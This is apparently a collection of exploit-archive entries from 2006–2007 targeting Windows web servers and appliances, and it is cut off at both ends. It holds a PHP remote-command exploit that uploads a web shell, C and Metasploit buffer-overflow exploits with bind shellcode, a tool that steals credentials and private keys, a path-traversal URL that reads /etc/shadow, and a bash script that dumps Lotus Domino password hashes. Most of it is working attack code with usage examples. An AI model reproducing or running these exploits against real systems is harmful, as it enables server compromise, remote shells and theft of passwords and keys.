Usage: php '.$argv[0].' host cmd OPTIONS
host: target server (ip/hostname)
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 2.2.2.2 ver -P1.1.1.1:80
php '.$argv[0].' 1.1.1.1 dir /q -p81
-----------------------------------------------------------------------------
');
die;
}
/*
software site: http://www.raidenhttpd.com/en/
description: "RaidenHTTPD is a fully featured web server software for Windows 98 / Me / 2000 / XP / 2003 platforms."
explanaition: this software carries a PHP interpreter (4.4.1 version...)
and you have an administrative interface in /raidenhttpd-admin folder
but... you can have anauthorized access to some scripts in
/raidenhttpd-admin/slice folder, in check.php at line 35 u have:
...
include_once($SoftParserFileXml); // This is the parser class.
...
$SoftParserFileXml var is not initizialized so u can include
an arbitrary uploaded temporary file or arbitrary http location
also register_globals and allow_url_fopen are enabled by default (harakiri?)
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$cmd="";
$port=80;
$proxy="";
for ($i=2; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p="/";} else {$p='http://'.$host.':'.$port."/";}
$data ="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"SoftParserFileXml\"; filename=\"suntzu\";\r\n";
$data.="Content-Type: image/jpeg;\r\n\r\n";
$data.="<?php set_time_limit(0); echo 'my_delim';passthru(\$_SERVER['HTTP_SUNTZU']);die;?>\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet ="POST ".$p."raidenhttpd-admin/slice/check.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="SUNTZU: $cmd\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"my_delim")){
echo "exploit succeeded...\n";$temp=explode("my_delim",$html);die($temp[1]);
}
echo "exploit failed...";
?>
# [2006-09-08]
80 NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07 <[email protected]>
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07 <[email protected]>
[+] Sending buffer: OK
Check your shell on 192.168.0.1:4444
Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include <winsock2.h>
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.com
*/
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x 13\x91\xba\x06"
"\x13\x83\xeb\xfc\xe2\xf4\x6d\xd0\xed\x5e\x79\x43\x f9\xec\x6e\xda"
"\x8d\x7f\xb5\x9e\x8d\x56\xad\x31\x7a\x16\xe9\xbb\x e9\x98\xde\xa2"
"\x8d\x4c\xb1\xbb\xed\x5a\x1a\x8e\x8d\x12\x7f\x8b\x c6\x8a\x3d\x3e"
"\xc6\x67\x96\x7b\xcc\x1e\x90\x78\xed\xe7\xaa\xee\x 22\x3b\xe4\x5f"
"\x8d\x4c\xb5\xbb\xed\x75\x1a\xb6\x4d\x98\xce\xa6\x 07\xf8\x92\x96"
"\x8d\x9a\xfd\x9e\x1a\x72\x52\x8b\xdd\x77\x1a\xf9\x 36\x98\xd1\xb6"
"\x8d\x63\x8d\x17\x8d\x53\x99\xe4\x6e\x9d\xdf\xb4\x ea\x43\x6e\x6c"
"\x60\x40\xf7\xd2\x35\x21\xf9\xcd\x75\x21\xce\xee\x f9\xc3\xf9\x71"
"\xeb\xef\xaa\xea\xf9\xc5\xce\x33\xe3\x75\x10\x57\x 0e\x11\xc4\xd0"
"\x04\xec\x41\xd2\xdf\x1a\x64\x17\x51\xec\x47\xe9\x 55\x40\xc2\xe9"
"\x45\x40\xd2\xe9\xf9\xc3\xf7\xd2\x17\x4f\xf7\xe9\x 8f\xf2\x04\xd2"
"\xa2\x09\xe1\x7d\x51\xec\x47\xd0\x16\x42\xc4\x45\x d6\x7b\x35\x17"
"\x28\xfa\xc6\x45\xd0\x40\xc4\x45\xd6\x7b\x74\xf3\x 80\x5a\xc6\x45"
"\xd0\x43\xc5\xee\x53\xec\x41\x29\x6e\xf4\xe8\x7c\x 7f\x44\x6e\x6c"
"\x53\xec\x41\xdc\x6c\x77\xf7\xd2\x65\x7e\x18\x5f\x 6c\x43\xc8\x93"
"\xca\x9a\x76\xd0\x42\x9a\x73\x8b\xc6\xe0\x3b\x44\x 44\x3e\x6f\xf8"
"\x2a\x80\x1c\xc0\x3e\xb8\x3a\x11\x6e\x61\x6f\x09\x 10\xec\xe4\xfe"
"\xf9\xc5\xca\xed\x54\x42\xc0\xeb\x6c\x12\xc0\xeb\x 53\x42\x6e\x6a"
"\x6e\xbe\x48\xbf\xc8\x40\x6e\x6c\x6c\xec\x6e\x8d\x f9\xc3\x1a\xed"
"\xfa\x90\x55\xde\xf9\xc5\xc3\x45\xd6\x7b\x61\x30\x 02\x4c\xc2\x45"
"\xd0\xec\x41\xba\x06\x13";
char buffer[BUFF_SIZE];
target list[] =
{
"XP SP2 Polish",
0x7d168877, //JMP ESP
"XP SP2 English",
0x7ca58265, //JMP ESP
"XP SP2 German",
0x7cb4d5ac, //JMP ESP
"2000 SP4 Polish",
0x77596433, //JMP ESP
"2000 SP4 English",
0x78326433 //JMP ESP
};
int main(int argc, char *argv[])
{
WSADATA wsa;
int sock, os, r_len, i,
a = (sizeof(list) / sizeof(target)) - 1;
unsigned long eip;
struct hostent *he;
struct sockaddr_in client;
printf("\n NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit\n");
printf(" Coded by h07 <[email protected]>\n");
if(argc < 3)
{
printf(" Usage: %s <host> <system>\n", argv[0]);
printf(" Sample: %s 192.168.0.1 0\n", argv[0]);
printf(" Systems..\n");
for(i = 0; i <= a; i++)
printf("[>] %d: %s\n", i, list[i].os_name);
return 1;
}
WSAStartup(MAKEWORD(2, 0), &wsa);
os = atoi(argv[2]);
if((os < 0) || (os > a))
{
printf("[-] Error: unknown target %d\n", os);
return -1;
}
eip = list[os].ret;
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if((he = gethostbyname(argv[1])) == NULL)
{
printf("[-] Unable to resolve\n");
return -1;
}
client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = htons(PORT);
client.sin_family = AF_INET;
if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
{
printf("[-] Error: connect()\n");
return -1;
}
r_len = 234;
memset(buffer, 0x41, r_len);
memcpy(buffer, "GET ", 4);
*((unsigned long*)(&buffer[r_len])) = eip;
memset(buffer + (r_len + 4), 0x90, 32);
strcat(buffer, shellcode);
strcat(buffer, " HTTP/1.1\r\n\r\n\x00");
//buffer["GET " + ("A" * 230) + RET + (NOP * 32) + shellcode + " HTTP/1.1\r\n\r\n\x00"]
if(send(sock, buffer, strlen(buffer), 0) != -1)
{
printf("[+] Sending buffer: OK\n");
printf(" Check your shell on %s:4444\n", argv[1]);
}
else
printf("[-] Sending buffer: failed\n");
printf(" Press enter to quit\n");
getchar();
return 0;
}
// [2006-09-27]
80 PrivateWire Gateway 3.7 Remote Buffer Overflow Exploit (win32)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
##
# From the author:
# This file may only be distributed as part of the Metasploit Framework.
# Any other use needs a written permission from the author.
##
package Msf::Exploit::privatewire_gateway_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Private Wire Gateway Buffer Overflow (win32)',
'Version' => '$Rev$',
'Authors' =>
[
'Michael Thumann <mthumann[at]ernw.de>',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'PATH' => [1, 'DATA', 'Installation Path of Privatewire','C:\Cipgw'],
},
'Payload' =>
{
'Space' => 8000,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x 5c\x1b",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
},
'Description' => Pex::Text::Freeform(qq{
This exploits a buffer overflow in the ADMCREG.EXE used
in the PrivateWire Online Registration Facility. .
}),
'Refs' =>
[
['BID', '18647'],
],
'DefaultTarget' => 4,
'Targets' => [
['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL
['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL
['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL
['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL
['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL
['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL
['Debugging', 0x41414141], # Crash
],
'Keys' => ['privatewire'],
'DisclosureDate' => 'June 26 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $path = $self->GetVar('PATH');
my $path_offset = length($path)-8;
my $target = $self->Targets->[$target_idx];
my $pattern = Pex::Text::AlphaNumText(8192);
my $jmp = # add 25 to ecx and jmp
"\x6a\x19".
"\x58".
"\x01\xc1".
"\xff\xe1";
substr($pattern, 0, length($shellcode), $shellcode);
substr($pattern, 8156- $path_offset, 4, pack('V', $target->[1]));
substr($pattern, 8160, length($jmp), $jmp);
my $request = "GET /" . $pattern . " HTTP/1.0\r\n\r\n";
$self->PrintLine(sprintf (" Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$s->Send($request);
$s->Close();
return;
}
1;
# [2006-10-29]
80 Easy File Sharing Web Server 4 Remote Information Stealer Exploit
/*
================================================== =================
0-day Alternative File Stream Exploit for Easy File Share Server 4
================================================== =================
Exploit allows malicious users to grab files from the server without
being authenticated completely bypassing security.
0-day Easy File Sharing Web Server v4.0 Information Stealer
Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com
This tool demonstrates EFS Web Server's Vulnerability to Alternative
Data Stream GET requests which allow unauthorized users to download server
critical files.
Discovered and Reported: 10-30-2006
Usage: exploit <hostname/IP> [port 80=default] [Method see below]
--------PoC Methods:-----
1 = Gather all login username and passwords and email addresses.[Default]
2 = Gather Private RSA Key and Certificates for server.
3 = Gather Private Messages used by Forum Users on the server
4 = Gather Server Settings File and SMTP server info.
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h> /* Win32 API */
#include <wininet.h> /* WinInet API */
int mthd;
unsigned short httpport;
char exploit[512], exploit2[512], exploit3[512], exploit4[512];
char logmsg[512];
char endmsg[512];
HINTERNET inet; /* WinInet Internet Handle */
FILE *file;
void ExploitHTTP (HINTERNET inet, const char *host, const char *exp)
{
HINTERNET connection; /* Connection Handle */
HINTERNET request; /* Request Handle */
unsigned long flags; /* HttpOpenRequest Flags */
char buffer[BUFSIZ];
unsigned long len;
printf("HOST: %s\n", host);
printf("PORT: %i\n", httpport);
if ((connection = InternetConnect(inet, host, httpport,
NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0))
== NULL)
{
printf("Failed to Connect...Exiting\n");
InternetCloseHandle(inet);
fclose(file);
exit(1);
}
flags = INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_AUTO_REDIRECT |
INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_COOKIES |
INTERNET_FLAG_RELOAD;
strcat(exp, "%3A%3A%24%44%41%54%41");
request = HttpOpenRequest(connection, "GET", exp, "HTTP/1.0", NULL, NULL, flags, 0);
if (request == NULL)
{
printf("HTTP Open Request failed....Exiting\n");
InternetCloseHandle(connection);
InternetCloseHandle(inet);
fclose(file);
exit(1);
}
if (!HttpSendRequest(request, NULL, 0, NULL, 0))
{
printf("HTTP Send Request failed....Exiting\n");
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(inet);
fclose(file);
exit(1);
}
printf("Exploit Sent...Dumping HTTP Return Packet...");
sleep(1000);
while (InternetReadFile(request, buffer, sizeof buffer, &len) && len > 0)
{
fwrite(buffer, len, 1, file);
if (fwrite(buffer, len, 1, stdout) < 1)
{
printf("Error Outputting HTTP Return Packet\n");
}
}
InternetCloseHandle(request);
InternetCloseHandle(connection);
}
int main (int argc, char *argv[])
{
printf("\n================================================ =========================\n");
printf("0-day Easy File Sharing Web Server v4.0 Information Stealer\n");
printf("Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com\n");
printf("This tool demonstrates EFS Web Server's Vulnerability to Alternative\n");
printf("Data Stream GET requests which allow unauthorized users to download server \n");
printf("critical files.\n");
printf("Discovered and Reported: 10-30-2006\n");
printf("\nUsage: %s <hostname/IP> [port 80=default] [Method see below]\n", argv[0]);
printf("--------PoC Methods:-----\n");
printf("1 = Gather all login username and passwords and email addresses.[Default]\n");
printf("2 = Gather Private RSA Key and Certificates for server.\n");
printf("3 = Gather Private Messages used by Forum Users on the server\n");
printf("4 = Gather Server Settings File and SMTP server info.\n");
printf("================================================== ==========================\n");
inet = InternetOpen("ESF Exp", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (inet == NULL)
{
printf("Error accessing InternetOpen API - Exiting...\n");
exit(1);
}
if (argc < 2)
{
printf("Invalid # of arguments...Exiting\n");
exit(1);
}
if (atoi(argv[3]) > 4)
{
mthd = 1;
}
if (atoi(argv[3]) <= 0)
{
mthd = 1;
}
mthd = atoi(argv[3]);
/* Set Up Exploits */
switch(mthd)
{
case 1:
file = fopen("Accounts.txt","a+");
sprintf(exploit, "%s", "%75%73%65%72%2E%73%64%62");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Accounts.txt\n");
break;
case 2:
file = fopen("RSAKeys.txt", "a+");
sprintf(exploit, "%s", "%53%65%72%76%65%72%4B%65%79%2E%70%65%6D");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to RSAKeys.txt\n");
break;
case 3:
file = fopen("Messages.txt", "a+");
sprintf(exploit, "%s", "%6D%73%67%31%2E%73%64%62");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Messages.txt\n");
break;
case 4:
file = fopen("Server.txt", "a+");
sprintf(exploit, "%s", "%6F%70%74%69%6F%6E%2E%69%6E%69");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Server.txt\n");
break;
}
sprintf(logmsg, "%s", argv[1]);
sprintf(logmsg, "%s", "\r\n\r\n\r\n");
fwrite(logmsg, strlen(logmsg), 1, file);
httpport = atoi(argv[2]);
ExploitHTTP(inet, argv[1], exploit);
if (mthd == 3)
{
printf("\n\n Sending 2nd Exploit...\n");
strcat(exploit2, "%6D%73%67%32%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit2);
printf("\n\n Sending 3rd Exploit...\n");
strcat(exploit3, "%6D%73%67%33%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit3);
printf("\n\n Sending final Exploit...\n");
strcat(exploit4, "%6D%73%67%34%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit4);
}
if (mthd == 2)
{
printf("\n\n Sending 2nd Exploit...\n");
strcat(exploit2, "%53%65%72%76%65%72%43%65%72%74%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit2);
printf("\n\n Sending final Exploit...\n");
strcat(exploit3, "%52%6F%6F%74%43%65%72%74%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit3);
}
fclose(file);
Sleep(500);
InternetCloseHandle(inet);
printf("\n\n============================================== =====\n");
printf("%s\n", endmsg);
printf("Proof Of Concept Exploit by Greg Linares\n");
printf("Send Comments/Concerns/Questions/Etc to GLinares.code [at] gmail [dot] com\n");
return 0;
}
// [2006-10-30]
80 NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit meta
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::navicopa_get_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Navicopa 2.01 Buffer Overflow',
'Version' => '$Revision: 0.1 $',
'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 400,
'MinNops' => 16,
'BadChars' => "\x00\x20\x0a\x0d\x2f\x25\x3f",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a classical stack overflow in Navicopa Web Server 2.01 version
Credit to h07 for discovered this vulnerability.
This is a port to the original h07 c code.
}),
'Refs' =>
[
['BID', 20250],
],
'Targets' =>
[
['Windows 2k/XP for all service pack English',228, 0x1002c46f ], # push esp,ret in IV320009.dll
['Windows 2k/XP for all service pack Italian',227, 0x1002c46f ], # push esp,ret in IV320009.dll
],
'Keys' => ['navicopa'],
'DisclosureDate' => 'Sep 28 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $pattern = $self->MakeNops($target->[1]);
$pattern .= pack('V', $target->[2]);
$pattern .= $self->MakeNops(32);
$pattern .= $shellcode;
my $request = "GET " . $pattern ." HTTP/1.1\r\n\r\n";
$self->PrintLine(sprintf (" Trying ".$target->[0]." using push esp ret at 0x%.8x...", $target->[2]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$s->Send($request);
sleep(3);
$s->Recv(-1, 10);
$s->Close();
return;
}
# [2007-01-07]
80 IP3 NetAccess < 4.1.9.6 Remote Arbitrary File Disclosure Vulnerability
I - TITLE
Security advisory: Arbitrary file disclosure vulnerability in
IP3 NetAccess leads to full system compromise
II - SUMMARY
Description: Arbitrary file disclosure vulnerability in IP3 NetAccess
leads to full system compromise
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)
Date: February 11th, 2007
Severity: High
References: http://www.devtarget.org/ip3-advisory-02-2007.txt
III - OVERVIEW
IP3's NetAccess is a device created for high demand environments
such as convention centers or hotels. It handles the Internet access
and provides for instance firewalling, billing, rate-limiting as well
as various authentication mechanisms. The device is administrated via
SSH or a web-based GUI. Further information about the product can be
found online at http://www.ip3.com/poverview.htm.
IV - DETAILS
Due to inproper input validation, all NetAccess devices with a firmware version
less than 4.1.9.6 are vulnerable to an arbitrary file disclosure vulnerability.
This vulnerability allows an unauthenticated remote attacker to abuse the
web interface and read any file on the remote system. Due to the fact that important
system files are world-readable (see bid #17698), this does include /etc/shadow
and thus leads to a full compromise of the device! In addition an attacker is
able to gain access to the proprietary code base of the device and potentially
identify as well as exploit other (yet unknown) vulnerabilities.
V - EXPLOIT CODE
The trivial vulnerability can be exploited by accessing the file "getfile.cgi"
with a relative file path such as
http://$target/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow
As the input to the "filename" parameter is not properly validated accessing
this URL will disclose the contents of /etc/shadow to a remote attacker.
VI - WORKAROUND/FIX
To address this problem, the vendor has released a new firmware version
(4.1.9.6) which is available at http://www.ip3.com. Hence all users of IP3's NetAccess
devices are asked to install this version immediately.
As a temporary workaround, one may also limit the accessibility of the web interface
of the device to authorized personnel only. Nevertheless contacting the vendor and
installing the new firmware version is highly recommended!
VII - DISCLOSURE TIMELINE
31. December 2006 - Notified vendor
31. December 2006 - Vulnerability confirmed
17. January 2007 - Patch released
11. February 2007 - Public disclosure
# [2007-02-11]
80 Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit
#!/bin/bash
#
# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $
#
# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
# Copyright (c) 2007 Marco Ivaldi <[email protected]>
#
# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled,
# stores sensitive data from names.nsf in hidden form fields, which allows
# remote attackers to read the HTML source to obtain sensitive information such
# as (1) the password hash in the HTTPPassword field, (2) the password change
# date in the HTTPPasswordChangeDate field, (3) the client platform in the
# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and
# (5) the client Lotus Domino release in the ClntBld field, a different
# vulnerability than CVE-2005-2696 (CVE-2005-2428).
#
# According to testing, it's possible to dump all HTTPPassword hashes using the
# $defaultview view instead of $users. This saves a considerable amount of time.
#
# The code may require some changes to properly work with your configuration.
#
# See also:
# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
#
# Usage:
# $ ./raptor_dominohash 192.168.0.202
# [...]
# Extracting the view entries...
# Done! 656 unique entries have been found.
# Now ready to dump password hashes...
# [...]
# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
# FirstName: Foo
# LastName: Bar
# ShortName: fbar
# HTTPPassword: (355E98E7C7B59BD810ED845AD0FD2FC4)
# [...]
#
# Vulnerable platforms:
# Lotus Domino R6 Webmail [tested]
# Lotus Domino R5 Webmail [untested]
# Lotus Domino R4 Webmail? [untested]
#
# Some vars
i=1
tmp1=dominohash1.tmp
tmp2=dominohash2.tmp
# Command line
host=$1
# Local fuctions
function header() {
echo ""
echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump"
echo "Copyright (c) 2007 Marco Ivaldi <[email protected]>"
echo ""
}
function footer() {
echo ""
exit 0
}
function usage() {
header
echo "usage : ./raptor_dominohash <host>"
echo "example: ./raptor_dominohash 192.168.0.202"
footer
}
function notfound() {
header
echo "error : curl not found"
footer
}
# Check if curl is there
curl=`which curl 2>/dev/null`
if [ $? -ne 0 ]; then
notfound
fi
# Input control
if [ -z "$1" ]; then
usage
fi
# Remove temporary files
rm -f $tmp1
rm -f $tmp2
header
# Extract the view entries
echo "Extracting the view entries..."
while :
do
curl "http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 2>/dev/null | grep unid >> $tmp1
# Check grep return value
if [ $? -ne 0 ]; then
break
fi
# Go for the next page
i=`expr $i + 30`
echo -ne "\b\b\b\b\b\b\b\b$i"
done
cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort | uniq > $tmp2
# Check if some view entries have been found
if [ ! -s $tmp2 ]; then
echo "No entries found on host ${host}!"
footer
fi
echo -ne "\b\b\b\b\b\b\b\bDone! "
echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found."
echo ""
# Perform the hash dumping
echo "Now ready to dump password hashes..."
echo ""
sleep 4
for unid in `cat $tmp2`
do
echo "[http://${host}/names.nsf/\$defaultview/${unid}]"
echo ""
#curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"'
curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' | awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' '{print $1 ":\t" $2}' | tr -d '">'
echo ""
done
footer
# [2007-02-13]
80 NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::naviCopa_cgi;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Buffer Overflow in NaviCopa HTTP server 2.01 (cgi-bin)',
'Version' => '$Rev: 3818 $',
'Authors' => [ 'www.skillTube.com', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'URL' => [1, 'DATA', 'The URL to the cgi-bin', '/cgi-bin/'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 900,
'BadChars' => "\x00\x26\x3d\x0a\x0d\x25\x2b\x2e\x3f",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the NaviCopa HTTP server
2.01 (release version 6th October 2006 or earlier). It is not the
same vulnerability as the one described in BID 20250.
The vulnerability was found by a member of skillTube.com and
allows reliable code execution. The only thing that may vary
is the path to the NaviCopa installation folder. On an English
version of Windows, it resides in the c:\\program files\\navicopa
directory. In that case, eip is overwritten with char 271 to 274.
To add a new target version of Windows (e.g. Spanish, Italian etc.),
you only need to change the offset to eip. As an example, in a
German version of Windows, the installation directory of navicopa is
c:\\programme\\navicopa. As a result, the path length is four characters
shorter than on an English version of Windows. As a consequence, the
offset to eip has to be increased by four.
Exploit was successfully tested against Windows 2000, XP and
Windows Vista (regardless of ASLR).
}),
'Refs' => [
['URL', 'http://www.skilltube.com'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['Universal exploit for all English versions of Windows (XP,2000,Vista)', 270, 0x1002c46f], # push esp, retn
['Universal exploit for all German versions of Windows (XP,2000,Vista)', 274, 0x1002c46f], # push esp, retn
],
'Keys' => ['naviCopa'],
'DisclosureDate' => 'March 2007',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_path = $self->GetVar('URL');
my $target_idx = $self->GetVar('TARGET');
my $shellcode =$self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine(" Attempting to exploit target " . $target->[0]);
my $pattern = "A"x900;
my $jmp = "\xeb\x04";
substr($pattern, $target->[1] , 4, pack('V', $target->[2])); # ret
substr($pattern, $target->[1] + 42, length($jmp), $jmp);
substr($pattern, $target->[1] + 44 , 4, pack('V', $target->[2])); #edx
substr($pattern, $target->[1] + 48 , length($shellcode), $shellcode);
my $request =
